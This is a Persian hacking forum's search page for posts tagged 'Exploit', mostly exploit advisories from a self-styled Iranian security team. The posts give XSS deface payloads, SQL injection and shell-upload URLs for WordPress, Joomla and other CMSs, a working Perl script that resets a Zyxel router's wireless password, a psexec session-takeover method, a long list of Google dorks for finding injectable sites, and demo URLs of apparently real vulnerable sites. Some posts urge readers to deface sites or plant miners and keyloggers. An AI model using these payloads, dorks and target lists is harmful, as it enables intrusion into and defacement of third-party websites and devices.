جستجو در تالار

در حال نمایش نتایج برای برچسب های 'Exploit'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


Product Groups

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالار ها

  • اخبار و اعلانات انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • بخش مسابقات انجمن
    • انتقادات و پیشنهادات
    • افتخارات و اطلاعیه های تیم گارد ایران
    • بخش ارتقاء کاربران
    • اخبار هک و امنیت
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

دسته ها

  • ویدیوهای آموزشی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


محل سکونت


Interests

31 نتیجه پیدا شد

  1. سلام خدمت اعضا محترم گارد ایران. خوب در این پست بنده قصد دارم که اکسپلویت نویسی رو به شما عزیزان آموزش بدم. بعضی از دوستان میپرسیدن که چطوری اکسپلویت ثبت میکنی و باگ پیدا میکنی و.. به همین خاطر تصمیم به ساخت این مجموعه گرفتم. خوب من از جناب گوگل برای ثبت اکسپلویت استفاده میکنم ولی اگر استقابال بشه از ابزارهای لینوکس هم میزارم. اهداف بنده از ایجاد این تاپیک: 1-کمک به افزایش سطح علمی عزیزان گارد ایران. 2-بالابردن تیم در بین تیم ها ثبت اکسپلویت 3-افزایش روز به روز تعداد اکسپلویتر و دیفیسر های تیم. اموزش پیدا کردن باگ هایxss,lfi,sql,shell upload,..در cms های مختلف==>اکسپلویت کردن==>ریپورت دادن=ثبت شدن باگ خوب دوستان گفته باشم استقبال نشه تاپیک دیر به دیر آپدیت میشه. به امید روزی که نام تک تک شما عزیزان رو در بخش ثبت اکسپلویت ببینیم.
  2. Host.net

    به نام خدا ........حدود ۲۰۰ تارگت روش هست........ # Exploit Title: contact-form-7.4.9.1 wordpress plugin lfi vulnerability # dork:inurl /wp-content/plugins/contact-form-7/ # Date: 29/november/2017 # Exploit Author: guardiransecurityteam_host.net # Vendor Homepage: wordpress.org # Software Link: wordpress.org/plugins/contact-form-7 # Version: 7.4.9.1 # Tested on: Black Arch Linux # CVE : N/A
  3. https://cxsecurity.com/issue/WLB-2018040113 ################################################## # Title : Nielsen Wordpress Theme Xss Stored Exploit # Date : 14 April 2018 # Author : GIST # Version : 1.4.1 # Google Dork : inurl:/wp-content/themes/nielsen # Youtube : # Tested on : Ubuntu # Vendor : https://themeforest.net/item/nielsen-ecommerce-wordpress-theme/9710159 ################################################## Description : Nielsen is a truly user-oriented e-commerce theme, with a multiconcept layout and a lot of advanced features to enhance your shop. There are more than 4.000 website that installed this theme. You Can Put Your Javascripts Code and Run it on website or you can Inject Your scripts (Miner or Keylogger) Xss : First Open Enter Google Dork And open Your target. then open an post and go to Comments section Then Put your script and post it. Request Method : Post -- response -- HTTP/1.1 200OK Server nginx/1.4.6 (Ubuntu) Date: Thu, 10 mar 2016 19:18:47 GMT Content-Type: text/html Transfer-Encoding: Chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:51:00 GMT Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragme: no-cache Content-encoing: gzip commands : <script>alert('Xss')</script> or "><script>alert('Xss')</script> or Enter Your Deface Page Source
  4. ثبت اکسپلویت Iranian Social Network Multiple Exploit https://cxsecurity.com/issue/WLB-2018040098 ########################################################## # Title : Iranian Social Network Multiple Exploit # Date : 12 April 2018 # Tested on : Ubuntu/Windows 10 # Google Dork : inurl:/register.php intitle:شبکه اجتماعی # Google Dork2 : inurl:/news2.php?id= intitle:شبکه اجتماعی # Author : GIST # Vendor : http://sana-net.com/ # Exploit Type : Remote # Version : All Version # CVE : - ########################################################### Description : Iranian Social Network Have Multiple Vulnerablity (Sqli , Xss , File Upload). We can inject and download database or upload shell. For using this vulnerabilities first you have to register with fake information then you can use the vulnerabilities Sql Injection : Url : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219' Request Method : Post -- response -- HTTP/1.1 200OK Server nginx/1.4.6 (Ubuntu) Date: Thu, 10 mar 2016 19:18:47 GMT Content-Type: text/html Transfer-Encoding: Chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:51:00 GMT Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragme: no-cache Content-encoing: gzip Xss : URL : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219 commands : <script>alert('Xss')</script> or "><script>alert('Xss')</script> File Upload : URL : /editprofilepic.php Method : Post Convert .php to .jpg and choose your shell and bypass file to .php with live http header. Directory Shell : site.com/images/users/shell.php
  5. DeMoN

    به نام خدا با عرض سلام. بعد از یک مدت نسبتا طولانی با یک دوره آموزشی مفید در زمینه تست نفود و امنیت در خدمت شما هستیم. قبلا ما دوره ای رو با نام اکسپلویت نویسی داشتیم و در این دوره ما آسیب پذیری های مختلف رو با استفاده از زبان پرل اکسپلویت میکنیم. پیش نیار دوره زبان برنامه نویسی پرل است که ما در این دوره سعی میکنیم توضیحاتی مخنصر رو راجع به قطعه کد ها هم بدیم تا تمام عزیزان بتونن استفاده کنند. سرفصل ها: 1-توضیحات ابتدایی و آشنایی با دوره 2-آشنایی مختصر با آسیب پذیری ها(قبلا دوره ای رو داشتیم برای کشف آسیب پذیری ها . لینک) 3-آشنایی با ماژول های پرکاربرد در اکسپلویت نویسی با پرل 4-آشنایی با دستورات پرکاربرد در این دوره 5-شروع و نوشتن اولین اکسپلویت به زبان پرل 6-آموزش کار با فایل ها و دایرکتوری ها 7-آموزش کار با متد POST و GET برای ارسال و دریافت درخواست ها به سرور 8-آموزش کار با پروتکل های مختلف 9-آشنایی با وب سرورها 10-آشنایی با Header ها و تجزیه و تجلیل آنها 11-تجزیه و تحلیل وب سرور اسیب پذیر برای نوشتن اکسپلویت 12-آموزش Perl CGI 13-آموزش نوشتن اکسپلویت برای انواع آپلودر ها 14-نوشتن اکسپلویت برای انواع CMS ها 15-توضیحات تکمیلی و پایان دوره امیدوارم از این دوره نهایت بهره رو ببرین. با تشکر های خودتون برای ادامه دوره به ما دلگرمی بدین. موفق و پیروز باشید.
  6. ثبت اکسپلویت ( Zyxel P-660HW-TI V3 ADSL CSRF ( change password #!/usr/bin/perl ########################################################### # Title : Zyxel P-660HW-TI V3 ADSL CSRF ( change password ) # Author : dr-iman/GIST # Exploit Type : Perl/Remote # Date : 3 Feb 2018 # Vendor : https://www.zyxel.com/support/DownloadLandingSR.shtml?c=gb&l=en&kbid=MD08229&md=P-660HW-T1%20v3 # Tested : Ubuntu - Windows 10 # GIST : c0d3!nj3ct!0n , REX , 0r0b4s , Mownten , AliZombie , MR.Python , Phoen1X ########################################################### # Zyxel P-660HW-T1 v3 Wireless ADSL Have CSRF Vuln.We can Remotly Change Password Wireless. # The reason for this vulnerability Is After entering the address (change the password) System Will Not Checked Te Password Field # Items needed : Wirelesss ADSL IP , NeW Password # There Is 3 Update For This ADSL Router . All versions are vulnerable use LWP::Simple; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); use HTTP::Request::Common qw(GET); use IO::Socket; my $ua = LWP::UserAgent->new; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print <<logo; _____ _ _____ _ _ _ |__ |_ _ _ _ ___| | | __|_ _ ___| |___|_| |_ ___ ___ | __| | |_'_| -_| | | __|_'_| . | | . | | _| -_| _| |_____|_ |_,_|___|_| |_____|_,_| _|_|___|_|_| |___|_| |___| |_| logo print "\nEner IP Address : "; $ip=<>; chomp($ip); print "\nEnter New Passwword : "; $pass=<>; chomp($pass); $url = "$ip/wzPPP.html"; my $content = $ua->get("$url")->content; if ($content =~ /Internet Configuration/ ) { my $wan = $ua->post($url, Content => [ 'next >' => 'submit',]); } my $content = $ua->get("$wan")->content; my $wan2 = $ua->post($content, Content => [ 'wzEnableWLAN' => 'WLANACtive', 'next >' => 'submit',]); my $content = $ua->get("$wan2")->content; my $lan = $ua->post($content, Content => [ 'wzWLANCfgHPSK' => $pass, 'next >' => 'submit',]); my $content = $ua->get("$lan")->content; my $fin = $ua->post($content, Content => [ 'Apply' => 'submit',]); if ($fin =~ /Congratulations/) { print "\nPassword Changed Successfully !\n"; } else{ print "\nProcess Failed !!\n"; }
  7. با سلام خدمت کلیه دوستان و اساتید امروز تصمیم گرفتم که دوره آموزش تست نفوذ همراه با زیرنویس فارسی در اختیار همه علاقمندان بذارم تا بتونن با کار های ضروری تست نفوذ آشنا بشن. این دوره توسط آقای مالکوم شور آموزش داده میشه. سرفصل ها: 00- معرفی (3 ویدیو - ~3 دقیقه) 01- تست نفوذ چیست؟ (2 ویدیو - ~16 دقیقه) 02- ابزار تست نفوذ (6 ویدیو - ~28 دقیقه) 03- اسکریپت نویسی بش (3 ویدیو - ~6 دقیقه) 04-اسکریپت نویسی پایتون (7 ویدیو - ~21 دقیقه) 05- کالی و متااسپلویت (7 ویدیو - ~25 دقیقه) 06-تست نفوذ وب (4 ویدیو - ~16 دقیقه) 07-درک کدهای اکسپلویت (4 ویدیو - ~35 دقیقه) 08- جمع بندی (1 ویدیو - ~2 دقیقه) طول دوره : جمعا 2 ساعت و 29 دقیقه درجه بندی سطح: متوسط ( Intermediate ) من هر قسمت رو با فاصله ارسال میکنم. چونکه اول باید زیرنویس رو ترجمه کنم بعد استارتر رو بهش بچسبونم و کلی دردسر دیگه. از فصل دو به بعد هم موارد آموزشی یه خورده تخصصی میشن و نیاز به حفظ کردن و تسلط دارن. پس توی فاصله ی بین هر آموزش هم سعی کنید با تکرار عملی آموزشی ها، اونا رو یاد بگیرید. آموزش ها حاوی فایل ویدیویی بهمراه زیرنویس فارسی هستن تا بتونید روی هر دستگاهی اونا رو مشاهده کنید. بدلیل آموزشی بودن پست به هیچ وجه اقدام به ارسال اسپم جهت تشکر و یا پرسیدن سوال نکنید. اگر ابهام، مشکل و یا سوالی داشتید بصورت خصوصی بپرسید ، تشکر هم که دکمه داره. اسپم ممنوع پسورد کلیه فایل های فشرده هم : guardiran.org امیدوارم لذت ببرید. کیفیت ویدیو ها : HD 720p چنانچه استقبال خوبی بشه، در سطح گسترده انواع آموزش ها رو ارائه خواهیم داد. از همینجا اعلام میکنم که ویدیوی آموزشی بدون واترمارک هست و امکان انتشار و اشتراک ویدیو وجود داره. پس باید بگم که مسئولیت هرگونه سوءاستفاده از دوره های آموزشی فقط و فقط بر عهده کاربر خاطی هست.
  8. * Title : SadafBlog Script Cross Site Scripting ( Xss Stored ) * Date : 6/19/2017 * Dork : inurl:list.php intitle:فهرست وبلاگ ها * Author : GIST * YouTube : https://youtu.be/a1hN9KC3wUQ * Version : All Version * Script Download : https://goo.gl/d7yDrt * Vendor HomePage : - * Tested On : Windows 10 About Script : Sadaf Blog SCript for blogs is beautiful and diverse capabilities including the ability to recruit blogs, etc. Some Of Facilities Of Sadaf Blog Script : 1-Allowing verification of reader comments to display 2-Assign a URL 3-The possibility of exclusive design templates or change in form, color and design blog 4-Ability to insert labels for each entry 5-Allocates 300 MB for upload in the blog admin panel And ... Exploit : 1- Open Target 2- Register A New Weblog ( Usually You Can Find It 'register' or 'register.php' ) 3- Complet Fields. 4- In Field Of Title Weblog Have To Use Inspect Element To Removing restrictions Of Character Delete This Part ' maxlength="60" ' 5- Input Your Deface Page in Title WEblog Filed 6-Click Save And Go To List Of Weblogs ( Usually You Can Find It 'list' or 'list.php' ) 7- You Will See Your Deface Page :) Demo : http://raziblog.ir/ http://shikblog.ir/ http://7blog.ir/ https://cxsecurity.com/issue/WLB-2017060128
  9. http://0day.today/exploit/description/27854 # Title : XAMPP v5.6.30 Local Buffer Overflow Exploit # Date : 5/27/2017 # Author : Guardiran Security Team # Tested On : Windows 10 # Demo Video : https://www.youtube.com/watch?v=fCay_l0dfcE&feature=youtu.be # CVE : - # Exploitation Technique : Local # Product & Service Introduction : https://www.apachefriends.org/index.html # Link Softwar : https://www.apachefriends.org/download.html # Version : v5.6.30 Description : Hello Guys. The vulnerability is caused by the lack of restrictions on the number of characters On Configuration of Control Panel [ Editor ] Character limit was applied only up to 256 characters If The Number Of characters Be up to 256 characters The Softwar will crash. [ModuleNames] Apache=Apache MySQL=MySQL FileZilla=FileZilla Mercury=Mercury Tomcat=Tomcat [Common] Edition= Editor=257 characters [ if the number of characters Be up to 256 characters The Softwar will crash] Browser= Debug=0 Debuglevel=0 TomcatVisible=1 Language=en Minimized=0 ======================================================== Exploit : 1- Run Xampp Control Panel [ xampp-control.exe] 2- Click Config > Editor 3- Select A Name With 257 Character Or up to 257 characters 4- Click Save 5- If You Click The Each Button The Softwar Will Crash Error Log : 1-Access Violation at address 0040A192 id module 'xampp-control.exe' & 2-Access Violation at address 0065AE42 id module 'xampp-control.exe' ========================================================= Discovered By : DeMoN Tnx All Member Guardiran Security Team # 0day.today [2017-05-28] #
  10. http://iedb.ir/exploits-7472.html ########################### # Microsoft Windows Authenticated Command Execution Vulnerability ########################### * Title: Microsoft Windows Authenticated Command Execution * Download Psexec Tools : https://technet.microsoft.com/en-us/bb842062 * Date : 5/1/2017 * Architectures : x86, x64 * Targets : Automatic * Version : All Version * VulnerabilityType Other : Command Execution * Vendor of Product : Microsoft * Affected Product Code Base : Windows xp , 7 , 8 , 8.1 , 10 , Windows Servers * Attack Type : Remote * Impact Code execution : trues * Video Link : https://www.youtube.com/watch?v=8yCtOTxe68w&t=11s ============================================= Reported By : Guardiran Security Team [DeMoN] ============================================= Description: We Use "psexec" utility provided by SysInternals To Get Access From Other Users on Server Without Any Payload Or User & Password If I Want To Connect To the Other users Without psexec I Will Get { unknown user or bad password } Error. With psexec ==> Connect Correctly To The User Target Without psexec ==> unknown user or bad password We Can Use Psexec Tool To Connect To the Other USers without Any Username and password For Example: First Check query user then run psexec tool on cmd and run This command [ psexec -s \\localhost cmd ] then user command [ tscon ID Number(for example 1) /dest:console ] Windows Without Checking Any User and Password Connect To The User ID 1
  11. * Title: puzzle creator CMS File Upload vulnerability * date: 4/22/2017 * Exploit Author : Gudrdiran Security Team * Google Dork : intitle:"puzzle creator" "index.php=difficulty=" * Softwar Link : http://www.puzzle-maker.com/ * Vendor Homepage: https://www.nimble.com/ * Tested On : Kali Linux w3af / Windows 8.1 ---------------------------------- Description : Hello Guys This is a file upload exploit we can upload our shell With Tamper data or Live Http Header Dir Shell: When You Bypass Your Shell With Tamper Data Or Live Http Header Target Will Be Shown you The URL( Shell ) Usually Dir Shell : /puzzle/name_shell.php Poc: Page vulnerable : [/puzzle/] Exploit : /puzzle/upload.php Demo: http://www.brandonbrady.com/puzzle/upload.php http://www.kidtopia.info/puzzle/upload.php http://www.teachertopia.info/puzzle/upload.php * Special Tnx : cod3!nj3ct!0n , REX , alizombie , abarestan , MR.IMAN , reza attacker , No_one , dastmale-sorkh , 1TED , Reza Attacker , J.ALL_Editor , S9pY, * Discovered By : DeMoN * We Are Guardiran Security Team https://cxsecurity.com/issue/WLB-2017040150
  12. باگ FBDj Stats cms Sql Injection Vulnerability ثبت شده توسط تیم امنیتی گارد ایران ########################### # FBDj Stats cms Sql Injection Vulnerability ########################### ########################### # FBDj Stats cms SQL Injection Vulnerability ########################### # Exploit Title: FBDj Stats cms SQL Injection Vulnerability # Date: 16/08/2016 # Exploit Author: Guardiran Security Team # Google Dork: inurl:\"playerdetails.php?id=\" # Version: All Version # Tested on: windows 10,kali linux,windows 8.1 HEllo Guys. This Is a Sql Injection Vulnerability You Can Inject The Sites Without Sql Injection Bug â��------------------------------â�� SQL INJECTION : This CMS And Also Have sqli Vulnerability. We Can inject the Bug As follows ... Bug in : [$site]/[Patch]/playerdetails.php?id=[sql] Demos : http://ts3.virtualpilots.fi/playerdetails.php?id=558 http://stats.acesovereurope.org/playerdetails.php?id=1659 http://www.dutcharcade.com/Sturmovik/playerdetails.php?id=2192 www.battle-fields.com/BF1stats/playerdetails.php?id=1 * Special Tnx : cod3!nj3ct!0n , REX , alizombie , dastmale-sorkh ,Comrade,Abarestan, Reza.attcker , 1TED , J_All_Editor * Discovered By : 1TED * We Are Guardiran Security Team * Guardiran.org ########################### ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-08-18] ###########################
  13. kingdeface

    در این فیلم آموزشی به شما آموزش میدم تا توسط Websploit در کالی لینوکس ( Kali linux Websploit ) بتونید لیست دایرکتوری تارگت مورد نظر رو به نمایش در بیارید . پسورد فایل : guardiran.org . Directory Scanner WebSploit .rar
  14. kingdeface

    دورک باگ Sql Injection inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id=d= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurltray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?av inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlpinions.php?id= inurl:spr.php?id= inurlages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurlarticipant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id= inurlop.php?id= inurl:shopping.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:tran******.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurlpinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt=
  15. a.a.a

    با سلام وخسته نباشید میشه چند تا اکسپیولت واسه هک کردن گوشی رو بدید که در کالی مورد استفاده باشه و کارش رو توضیح بدید
  16. سلام مجدد. خوب اینم دومین باگ جوملا که اینم رده HIGH هست خدمت شما عزیزان گل تیم. ثبت اکسپلویت Joomla Remot File Upload Vulnerability به نام تیم امنیتی گارد ایران. https://cxsecurity.com/issue/WLB-2015110194 http://iedb.ir/exploits-4198.html ######################################################## # Exploit Title: Joomla Remot File Upload Vulnerability ######################################################## # Google Dork1: inurl:index.php?option=com_media & site:com # Google Dork2: inurl:index.php?option=com_media & site:org # Google Dork3: inurl:index.php?option=com_media & site:net # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [https://developer.joomla.org/joomlacode-archive/issue-29776.html] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.This Is A Olugin Of Joomla For Upload Files. # Exploit: # Add This Link After Address Target # /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # For Exmple: Site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Demo: # http://drugfreeclubXsofamerica.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.saba4X215.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.johnwargoX.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author= # http://www.diffhospitXal.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.smartcaXrleasing.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://fvteamsportXs.com/joomla/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  17. سلام خدمت دوستان عزیز گارد ایران. خوب یک دو روزی کم رنگ بودم برگشتم با ثبت دوتا باگ رده HIGH برای تیم و شما عزیزان که کلی سایت دیفیس کنین. ثبت اکسپلویت Joomla Autostand File Upload Vulnerability به نام تیم امنیتی گارد ایران. https://cxsecurity.com/issue/WLB-2015110195 http://iedb.ir/exploits-4199.html ######################################################## # Exploit Title: Joomla Autostand File Upload Vulnerability ######################################################## # Google Dork: inurl:/images/autostand/ # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://100cms.org/extension/joomla/4801-Autostand] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # This Is Like As RFU Bug. # You Can Upload Your Image In Your Target. # Also You Can Bypass Your Shell To .jpg Then Upload It In Target. ######################################################## # Exploit: # Add This Link To Target After This The Words: # /pt/ | /asp/ And The Other Words # {/index.php?option=com_autostand&func=newItem} ######################################################## # Demo: # http://smartXonecity.com/pt/index.php?option=com_autostand&func=newItem # http://smaXrtonecity.com/pt/index.php?option=com_autostand&func=newItem #http://www.antaresXmotors.cl/asp/index.php?option=com_autostand&func=newItem # http://autoschapaXs.com/index.php?option=com_autostand&func=newItem # http://lepetitvo.cXom/index.php?option=com_autostand&func=newItem # http://www.geeX-wagen.co.uk/index.php?option=com_autostand&func=newItem # http://www.auXtorimessafranco.com/index.php?option=com_autostand&func=newItem # http://www.fXirstcar45.fr/annonces-automobile/newitem ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  18. ثبت اکسپلویت (e107 v2 Bootstrap CMS XSS Vulnerability) به نام تیم امنیتی گارد ایران(Guardiran Security Team). به امید پیشرفت های روز افزون تیم بزررگ گارد ایران. https://cxsecurity.com/issue/WLB-2015110174 ######################################################## # Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability ######################################################## # Google Dork: Proudly powered by e107 # Date: [19/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://e107.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # CMS user details section is vulnerable to XSS. You can run XSS payloads. # XSS Vulnerability #1: # Go Update user settings page # "http://{target-url}/usersettings.php" # Set Real Name value; # "><script>alert(String.fromCharCode(88, 83, 83))</script> # or # "><script>alert(document.cookie)</script> ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  19. ثبت اکسپلویت (bisnis7/Cross Site Scripting(XSS به نام تیم امنیتی گارد ایران(Guardiran Security Team). https://cxsecurity.com/issue/WLB-2015110116 http://iedb.ir/exploits-4130.html ######################################################## # Exploit Title: bisnis7/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Bisnis7 " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://bisnis7.com.webstatsdomain.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.rumahguidXes.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.geestringXs.net/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://dumbwaiterinXdonesia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  20. ثبت اکسپلویت (StudioWeb/Cross Site Scripting(XSS به نام تیم امنیتی گارد ایران(Guardiran Security Team). https://cxsecurity.com/issue/WLB-2015110115 http://iedb.ir/exploits-4129.html ######################################################## # (Exploit Title: StudioWeb/Cross Site Scripting(XSS ######################################################## # Google Dork: inurl:"poto" intext:"powered by StudioWeb " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://www.studioweb.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://assalamherbal222X.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # 